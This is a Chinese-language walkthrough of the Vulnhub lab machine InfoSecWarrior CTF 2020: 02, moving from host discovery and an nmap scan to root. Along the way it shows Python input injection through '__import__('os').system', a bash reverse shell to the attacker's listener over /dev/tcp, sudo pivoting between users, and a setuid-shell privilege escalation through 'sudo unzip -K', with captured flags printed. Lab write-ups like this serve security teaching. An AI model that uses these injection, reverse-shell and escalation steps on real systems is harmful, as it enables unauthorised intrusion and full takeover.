InfoSecWarriorBox 2
作者: jason_huawen
靶机基本信息
名称:InfoSecWarrior CTF 2020: 02
地址:
https://www.vulnhub.com/entry/infosecwarrior-ctf-2020-02,447/
提示:Enumerate Enumerate and Enumerate is the motto to solve this box.
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/InfoSecWarriorBox2]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.203.0/16 | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 3 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.100 08:00:27:f3:da:85 2 120 PCS Systemtechnik GmbH
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.245 08:00:27:f7:e2:30 2 120 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.245
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/InfoSecWarriorBox2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.245 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-01 04:44 EST
Nmap scan report for bogon (192.168.56.245)
Host is up (0.000076s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 89:f2:1b:40:c4:0c:3c:79:39:73:9d:fc:cc:ab:2b:0a (RSA)
| 256 05:db:cf:29:90:f6:e4:3f:4f:74:c9:d2:57:81:6e:ff (ECDSA)
|_ 256 9a:7d:f5:dd:90:51:b2:eb:3c:33:36:9f:25:0e:8c:21 (ED25519)
56563/tcp open unknown
| fingerprint-strings:
| GenericLines:
| Welcome to
| ____ __ __ _
| ___/ ___| ___ __\x20\x20 / /_ _ _ __ _ __(_) ___ _ __
| \x20/ _ / __\x20\x20/\x20/ / _` | '__| '__| |/ _ \| '__|
| |__) | __/ (__ \x20V V / (_| | | | | | | (_) | |
| |___|_| |_|_| ___/____/ ___|___| _/_/ __,_|_| |_| |_|___/|_|
| Please input number of ping packet you want to send??: Traceback (most recent call last):
| File "./script.py", line 18, in <module>
| int(input(' Please input number of ping packet you want to send??: '))
| File "<string>", line 0
| SyntaxError: unexpected EOF while parsing
| NULL:
| Welcome to
| ____ __ __ _
| ___/ ___| ___ __\x20\x20 / /_ _ _ __ _ __(_) ___ _ __
| \x20/ _ / __\x20\x20/\x20/ / _` | '__| '__| |/ _ \| '__|
| |__) | __/ (__ \x20V V / (_| | | | | | | (_) | |
| |___|_| |_|_| ___/____/ ___|___| _/_/ __,_|_| |_| |_|___/|_|
|_ Please input number of ping packet you want to send??:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port56563-TCP:V=7.92%I=7%D=12/1%Time=63887772%P=x86_64-pc-linux-gnu%r(N
SF:ULL,216,"Welcome\x20to\x20\r\n\x20\r\n\r\n\x20\x20___\x20\x20\x20\x20\x
SF:20\x20\x20\x20__\x20\x20\x20\x20\x20\x20____\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20__\x20\x20\x20\x20\x20\x20\x20\x20__\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20_\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\r\n\x20\|_\x20_\|_\x20__\x20\x20/\x20_\|\x20___/\x20___\|\
SF:x20\x20___\x20\x20__\\\x20\\\x20\x20\x20\x20\x20\x20/\x20/_\x20_\x20_\x
SF:20__\x20_\x20__\(_\)\x20___\x20\x20_\x20__\x20\r\n\x20\x20\|\x20\|\|\x2
SF:0'_\x20\\\|\x20\|_\x20/\x20_\x20\\___\x20\\\x20/\x20_\x20\\/\x20__\\\x2
SF:0\\\x20/\\\x20/\x20/\x20_`\x20\|\x20'__\|\x20'__\|\x20\|/\x20_\x20\\\|\
SF:x20'__\|\r\n\x20\x20\|\x20\|\|\x20\|\x20\|\x20\|\x20\x20_\|\x20\(_\)\x2
SF:0\|__\)\x20\|\x20\x20__/\x20\(__\x20\\\x20V\x20\x20V\x20/\x20\(_\|\x20\
SF:|\x20\|\x20\x20\|\x20\|\x20\x20\|\x20\|\x20\(_\)\x20\|\x20\|\x20\x20\x2
SF:0\r\n\x20\|___\|_\|\x20\|_\|_\|\x20\x20\\___/____/\x20\\___\|\\___\|\x2
SF:0\\_/\\_/\x20\\__,_\|_\|\x20\x20\|_\|\x20\x20\|_\|\\___/\|_\|\x20\x20\x
SF:20\r\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\r\n\r\n\r\n\x20Please\x20input\x20number\x20of\x20pi
SF:ng\x20packet\x20you\x20want\x20to\x20send\?\?:\x20")%r(GenericLines,30B
SF:,"Welcome\x20to\x20\r\n\x20\r\n\r\n\x20\x20___\x20\x20\x20\x20\x20\x20\
SF:x20\x20__\x20\x20\x20\x20\x20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20__\x20\x20\x20\x20\x20\x20\x20\x20__\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20_\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\r\n\x20\|_\x20_\|_\x20__\x20\x20/\x20_\|\x20___/\x20___\|\x20\x20
SF:___\x20\x20__\\\x20\\\x20\x20\x20\x20\x20\x20/\x20/_\x20_\x20_\x20__\x2
SF:0_\x20__\(_\)\x20___\x20\x20_\x20__\x20\r\n\x20\x20\|\x20\|\|\x20'_\x20
SF:\\\|\x20\|_\x20/\x20_\x20\\___\x20\\\x20/\x20_\x20\\/\x20__\\\x20\\\x20
SF:/\\\x20/\x20/\x20_`\x20\|\x20'__\|\x20'__\|\x20\|/\x20_\x20\\\|\x20'__\
SF:|\r\n\x20\x20\|\x20\|\|\x20\|\x20\|\x20\|\x20\x20_\|\x20\(_\)\x20\|__\)
SF:\x20\|\x20\x20__/\x20\(__\x20\\\x20V\x20\x20V\x20/\x20\(_\|\x20\|\x20\|
SF:\x20\x20\|\x20\|\x20\x20\|\x20\|\x20\(_\)\x20\|\x20\|\x20\x20\x20\r\n\x
SF:20\|___\|_\|\x20\|_\|_\|\x20\x20\\___/____/\x20\\___\|\\___\|\x20\\_/\\
SF:_/\x20\\__,_\|_\|\x20\x20\|_\|\x20\x20\|_\|\\___/\|_\|\x20\x20\x20\r\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\r\n\r\n\r\n\x20Please\x20input\x20number\x20of\x20ping\x20p
SF:acket\x20you\x20want\x20to\x20send\?\?:\x20Traceback\x20\(most\x20recen
SF:t\x20call\x20last\):\r\n\x20\x20File\x20\"\./script\.py\",\x20line\x201
SF:8,\x20in\x20<module>\r\n\x20\x20\x20\x20num\x20=\x20int\(input\('\x20Pl
SF:ease\x20input\x20number\x20of\x20ping\x20packet\x20you\x20want\x20to\x2
SF:0send\?\?:\x20'\)\)\r\n\x20\x20File\x20\"<string>\",\x20line\x200\r\n\x
SF:20\x20\x20\x20\r\n\x20\x20\x20\x20\^\r\nSyntaxError:\x20unexpected\x20E
SF:OF\x20while\x20parsing\r\n");
MAC Address: 08:00:27:F7:E2:30 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.06 seconds
NMAP扫描结果表明目标主机有2个开放端口22(SSH)、56563(未知)。
获取Shell
由于目标主机SSH服务没有可利用的漏洞。接下来主要围绕56563端口,用浏览器访问该端口,返回:
Welcome to
___ __ ____ __ __ _
|_ _|_ __ / _| ___/ ___| ___ __\ \ / /_ _ _ __ _ __(_) ___ _ __
| || '_ \| |_ / _ \___ \ / _ \/ __\ \ /\ / / _` | '__| '__| |/ _ \| '__|
| || | | | _| (_) |__) | __/ (__ \ V V / (_| | | | | | | (_) | |
|___|_| |_|_| \___/____/ \___|\___| \_/\_/ \__,_|_| |_| |_|\___/|_|
Please input number of ping packet you want to send??: Traceback (most recent call last):
File "./script.py", line 18, in <module>
num = int(input(' Please input number of ping packet you want to send??: '))
File "<string>", line 1, in <module>
NameError: name 'GET' is not defined
似乎是执行script.py脚本,也许不是web服务,用telnet连接该端口:
┌──(kali㉿kali)-[~/Vulnhub/InfoSecWarriorBox2]
└─$ telnet 192.168.56.245 56563
Trying 192.168.56.245...
Connected to 192.168.56.245.
Escape character is '^]'.
Welcome to
___ __ ____ __ __ _
|_ _|_ __ / _| ___/ ___| ___ __\ \ / /_ _ _ __ _ __(_) ___ _ __
| || '_ \| |_ / _ \___ \ / _ \/ __\ \ /\ / / _` | '__| '__| |/ _ \| '__|
| || | | | _| (_) |__) | __/ (__ \ V V / (_| | | | | | | (_) | |
|___|_| |_|_| \___/____/ \___|\___| \_/\_/ \__,_|_| |_| |_|\___/|_|
Please input number of ping packet you want to send??: 1
ping target (CTF.InfoSecWarrior)...
64 bytes from 127.0.0.1: icmp_seq=1 ttl=31337 time=0.028 ms
Connection closed by foreign host.
后台应该在执行 ping -c {num} 127.0.0.1命令:
可以动态载入__import__('os')__.system("/bin/bash"),这样就可以拿到shell。_
┌──(kali㉿kali)-[~/Vulnhub/InfoSecWarriorBox2]
└─$ telnet 192.168.56.245 56563
Trying 192.168.56.245...
Connected to 192.168.56.245.
Escape character is '^]'.
Welcome to
___ __ ____ __ __ _
|_ _|_ __ / _| ___/ ___| ___ __\ \ / /_ _ _ __ _ __(_) ___ _ __
| || '_ \| |_ / _ \___ \ / _ \/ __\ \ /\ / / _` | '__| '__| |/ _ \| '__|
| || | | | _| (_) |__) | __/ (__ \ V V / (_| | | | | | | (_) | |
|___|_| |_|_| \___/____/ \___|\___| \_/\_/ \__,_|_| |_| |_|\___/|_|
Please input number of ping packet you want to send??: __import__('os').system("/bin/bash")
bash: cannot set terminal process group (15800): Inappropriate ioctl for device
bash: no job control in this shell
bla1@ck04:~$ bla1@ck04:~$ id
uid=1001(bla1) gid=1001(bla1) groups=1001(bla1)
bla1@ck04:~$ bla1@ck04:~$
bla1@ck04:~$ cat bla2-note
cat bla2-note
My group password is czNjcjN0
I encoded my gpasswd :-P
bla1@ck04:~$
bla1@ck04:~$ id
id
uid=1001(bla1) gid=1001(bla1) groups=1001(bla1)
bla1@ck04:~$
bla1@ck04:~$ cd /home
cd /home
bla1@ck04:/home$
bla1@ck04:/home$ ls
ls
bla bla1 bla2 ck04
bla1@ck04:/home$
bla2-note文件虽然有个密码但是是组密码,不知如何利用。尝试登录ck04用户:
┌──(kali㉿kali)-[~/Vulnhub/InfoSecWarriorBox2]
└─$ ssh [email protected]
The authenticity of host '192.168.56.245 (192.168.56.245)' can't be established.
ED25519 key fingerprint is SHA256:1ZORKwkYqKUIbnD6szqzCNxwimK6Qi1HbDH7ze1nhWE.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:34: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.245' (ED25519) to the list of known hosts.
(-(-_(-_-)_-)-) (-(-_(-_-)_-)-) (-(-_(-_-)_-)-)
░░░░░░░░▄██████▄ Do this and I will give you a Hint
░░░░░░░█▀▀▀██▀▀▀▄
░░░░░░░█▄▄▄██▄▄▄█ Laugh uncontrollably for about 3 minutes
░░░░░░░▀█████████ then suddenly stop and look suspiciously
░░░░░░░░▀███▄███▀░░ at everyone who looks at you.
░░░░░░░░░▀████▀░░░░░ Or
░░░░░░░▄████████▄░░░░ Enumerate Hostname and Distro's codename of this box
░░░░░░████████████░░░░ And try to get Secure SHell
(-(-_(-_-)_-)-) (-(-_(-_-)_-)-) (-(-_(-_-)_-)-)
PS: For Newbie refer this website to know more : google.co.in
[email protected]'s password:
作者提示ck04的密码跟hostname以及codename有关系
bla1@ck04:/home/ck04$ uname -a
uname -a
Linux ck04 5.0.0-23-generic #24~18.04.1-Ubuntu SMP Mon Jul 29 16:12:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
bla1@ck04:/home/ck04$
bla1@ck04:/home/ck04$ cat /etc/*release
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.3 LTS"
NAME="Ubuntu"
VERSION="18.04.3 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.3 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
bla1@ck04:/home/ck04$
bla1@ck04:/home/ck04$
codename是bionic。
用bionic作为密码可以正常登录,但是执行一个命令后SSH就自动断了。
bla1@ck04:/home/ck04$ cat shell
cat shell
#!/bin/sh
cat /home/bla/user.txt
read ip
echo `$ip` command not found
bla1@ck04:/home/ck04$
bla1@ck04:/home/ck04$
发现输入/bin/bash,可以转为shell
┌──(kali㉿kali)-[~/Vulnhub/InfoSecWarriorBox2]
└─$ ssh [email protected]
(-(-_(-_-)_-)-) (-(-_(-_-)_-)-) (-(-_(-_-)_-)-)
░░░░░░░░▄██████▄ Do this and I will give you a Hint
░░░░░░░█▀▀▀██▀▀▀▄
░░░░░░░█▄▄▄██▄▄▄█ Laugh uncontrollably for about 3 minutes
░░░░░░░▀█████████ then suddenly stop and look suspiciously
░░░░░░░░▀███▄███▀░░ at everyone who looks at you.
░░░░░░░░░▀████▀░░░░░ Or
░░░░░░░▄████████▄░░░░ Enumerate Hostname and Distro's codename of this box
░░░░░░████████████░░░░ And try to get Secure SHell
(-(-_(-_-)_-)-) (-(-_(-_-)_-)-) (-(-_(-_-)_-)-)
PS: For Newbie refer this website to know more : google.co.in
[email protected]'s password:
_________ ___. ____ __. .__ .__ __ _______ _____
\_ ___ \___.__.\_ |__ ___________| |/ _| ____ |__| ____ | |___/ |_ \ _ \ / | |
/ \ \< | | | __ \_/ __ \_ __ \ < / \| |/ ___\| | \ __\ / /_\ \ / | |_
\ \___\___ | | \_\ \ ___/| | \/ | \| | \ / /_/ > Y \ | \ \_/ \/ ^ /
\______ / ____| |___ /\___ >__| |____|__ \___| /__\___ /|___| /__| \_____ /\____ |
\/\/ \/ \/ \/ \/ /_____/ \/ \/ |__|
You found user flag = 9b36b2e89df94bc458d629499d38cf86
Want Hint/Help for root message me @CyberKnight00
\__/ \__/ \__/ \__/ \__/ \__/ \__/
(oo) (o-) (@@) (xx) (--) ( ) (OO)
//||\\ //||\\ //||\\ //||\\ //||\\ //||\\ //||\\
bug bug bug dead bug blind bug after
winking hangover bug sleeping bug seeing a
female
bug
/bin/bash
ck04@ck04:~$
但这个shell不能改变目录,可以spawn另一个shell
ck04@ck04:/home$ which nc
ck04@ck04:/home$ bash -i >& /dev/tcp/192.168.56.206/5555 0>&1
┌──(kali㉿kali)-[~/Vulnhub/Darkhole]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.245] 34240
ck04@ck04:/home$
这个shell可以正常执行命令。
ck04@ck04:~$ sudo -l
sudo -l
Matching Defaults entries for ck04 on ck04:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User ck04 may run the following commands on ck04:
(bla) NOPASSWD: ALL
ck04@ck04:~$
发现ck04可以转变为bla用户
ck04@ck04:~$ sudo -l
sudo -l
Matching Defaults entries for ck04 on ck04:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User ck04 may run the following commands on ck04:
(bla) NOPASSWD: ALL
ck04@ck04:~$ sudo -u bla /bin/bash
sudo -u bla /bin/bash
id
uid=1000(bla) gid=1000(bla) groups=1000(bla),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bla@ck04:~$ ls
ls
Desktop Downloads Pictures shell Videos
Documents Music Public Templates
bla@ck04:~$ cd /home
cd /home
bla@ck04:/home$ ls -alh
ls -alh
total 24K
drwxr-xr-x 6 root root 4.0K Jan 28 2020 .
drwxr-xr-x 25 root root 4.0K Dec 1 15:05 ..
drwxr-x--- 16 bla bla 4.0K Feb 14 2020 bla
drwxr-x--- 3 bla1 bla1 4.0K Feb 14 2020 bla1
drwxrwx--- 3 bla2 bla2 4.0K Feb 14 2020 bla2
drwxr-xr-x 15 ck04 ck04 4.0K Feb 14 2020 ck04
bla@ck04:/home$ cd bla
cd bla
bla@ck04:/home/bla$ ls -alh
ls -alh
total 96K
drwxr-x--- 16 bla bla 4.0K Feb 14 2020 .
drwxr-xr-x 6 root root 4.0K Jan 28 2020 ..
lrwxrwxrwx 1 root root 9 Jan 27 2020 .bash_history -> /dev/null
-rw-r--r-- 1 bla bla 220 Jan 27 2020 .bash_logout
-rw-r--r-- 1 bla bla 3.7K Jan 27 2020 .bashrc
drwx------ 15 bla bla 4.0K Feb 13 2020 .cache
drwx------ 14 bla bla 4.0K Feb 13 2020 .config
drwx------ 3 root root 4.0K Jan 28 2020 .dbus
drwxr-xr-x 2 bla bla 4.0K Feb 13 2020 Desktop
drwxr-xr-x 2 bla bla 4.0K Jan 27 2020 Documents
drwxr-xr-x 2 bla bla 4.0K Feb 13 2020 Downloads
drwx------ 3 bla bla 4.0K Jan 27 2020 .gnupg
-rw-rw-r-- 1 bla bla 0 Feb 13 2020 .hushlogin
-rw------- 1 bla bla 12K Feb 13 2020 .ICEauthority
drwx------ 3 bla bla 4.0K Jan 27 2020 .local
drwxr-xr-x 2 bla bla 4.0K Jan 27 2020 Music
drwxr-xr-x 2 bla bla 4.0K Jan 27 2020 Pictures
-rw-r--r-- 1 bla bla 807 Jan 27 2020 .profile
drwxr-xr-x 2 bla bla 4.0K Jan 27 2020 Public
-rw-r--r-- 1 bla bla 66 Jan 27 2020 .selected_editor
drwx------ 2 bla bla 4.0K Feb 13 2020 .ssh
drwxr-xr-x 2 bla bla 4.0K Jan 27 2020 Templates
-rw-rw---- 1 bla bla 1.2K Feb 12 2020 user.txt
drwxr-xr-x 2 bla bla 4.0K Jan 27 2020 Videos
bla@ck04:/home/bla$ cat user.txt
cat user.txt
_________ ___. ____ __. .__ .__ __ _______ _____
\_ ___ \___.__.\_ |__ ___________| |/ _| ____ |__| ____ | |___/ |_ \ _ \ / | |
/ \ \< | | | __ \_/ __ \_ __ \ < / \| |/ ___\| | \ __\ / /_\ \ / | |_
\ \___\___ | | \_\ \ ___/| | \/ | \| | \ / /_/ > Y \ | \ \_/ \/ ^ /
\______ / ____| |___ /\___ >__| |____|__ \___| /__\___ /|___| /__| \_____ /\____ |
\/\/ \/ \/ \/ \/ /_____/ \/ \/ |__|
You found user flag = 9b36b2e89df94bc458d629499d38cf86
Want Hint/Help for root message me @CyberKnight00
\__/ \__/ \__/ \__/ \__/ \__/ \__/
(oo) (o-) (@@) (xx) (--) ( ) (OO)
//||\\ //||\\ //||\\ //||\\ //||\\ //||\\ //||\\
bug bug bug dead bug blind bug after
winking hangover bug sleeping bug seeing a
female
bug
bla@ck04:/home/bla$
提权
bla@ck04:/home/bla$ sudo -l
sudo -l
Matching Defaults entries for bla on ck04:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bla may run the following commands on ck04:
(root) NOPASSWD: /usr/bin/virtualbox, /usr/bin/unzip
(bla) NOPASSWD: ALL
bla@ck04:/home/bla$ sudo /usr/bin/unzip -K shell.zip
sudo /usr/bin/unzip -K shell.zip
unzip: cannot find or open shell.zip, shell.zip.zip or shell.zip.ZIP.
bla@ck04:/home/bla$ cp /bin/sh .
cp /bin/sh .
bla@ck04:/home/bla$ chmod +s sh
chmod +s sh
bla@ck04:/home/bla$ zip shell.zip sh
zip shell.zip sh
adding: sh (deflated 51%)
bla@ck04:/home/bla$ sudo /usr/bin/unzip -K shell.zip
sudo /usr/bin/unzip -K shell.zip
Archive: shell.zip
replace sh? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
y
inflating: sh
bla@ck04:/home/bla$ ./sh -p
./sh -p
# cd /root
cd /root
# ls -alh
ls -alh
total 40K
drwx------ 7 root root 4.0K Feb 14 2020 .
drwxr-xr-x 25 root root 4.0K Dec 1 15:05 ..
lrwxrwxrwx 1 root root 9 Jan 27 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 3 root root 4.0K Jan 27 2020 .cache
drwx------ 3 root root 4.0K Jan 28 2020 .config
drwx------ 3 root root 4.0K Jan 27 2020 .gnupg
-rw-r--r-- 1 root root 0 Feb 13 2020 .hushlogin
drwxr-xr-x 3 root root 4.0K Jan 27 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
---------- 1 root root 850 Feb 14 2020 proof.txt
drwx------ 2 root root 4.0K Feb 13 2020 .ssh
# cat proof.txt
cat proof.txt
_________ ___. ____ __. .__ .__ __ _______ _____
\_ ___ \___.__.\_ |__ ___________| |/ _| ____ |__| ____ | |___/ |_ \ _ \ / | |
/ \ \< | | | __ \_/ __ \_ __ \ < / \| |/ ___\| | \ __\ / /_\ \ / | |_
\ \___\___ | | \_\ \ ___/| | \/ | \| | \ / /_/ > Y \ | \ \_/ \/ ^ /
\______ / ____| |___ /\___ >__| |____|__ \___| /__\___ /|___| /__| \_____ /\____ |
\/\/ \/ \/ \/ \/ /_____/ \/ \/ |__|
flag = 1876056353cb2e6253fd0ce121ef1b3f
This flag is a proof that you got the root shell.
You have to submit your report contaning all steps you take to got root shell.
Send your report at our e-mail address : [email protected] & [email protected]
#
继续sudo -l, 发现unzip可以用来提权,参照GTFOBINS网站的方法进行提权:
cp /bin/sh .
chmod +s sh
zip shell.zip sh
sudo unzip -K shell.zip
./sh -p
成功得到root shell,并拿到root flag.
标签:__,___,SF,ck04,Vulnhub,靶机,bla,x20,InfoSecWarriorBox From: https://www.cnblogs.com/jason-huawen/p/16942413.html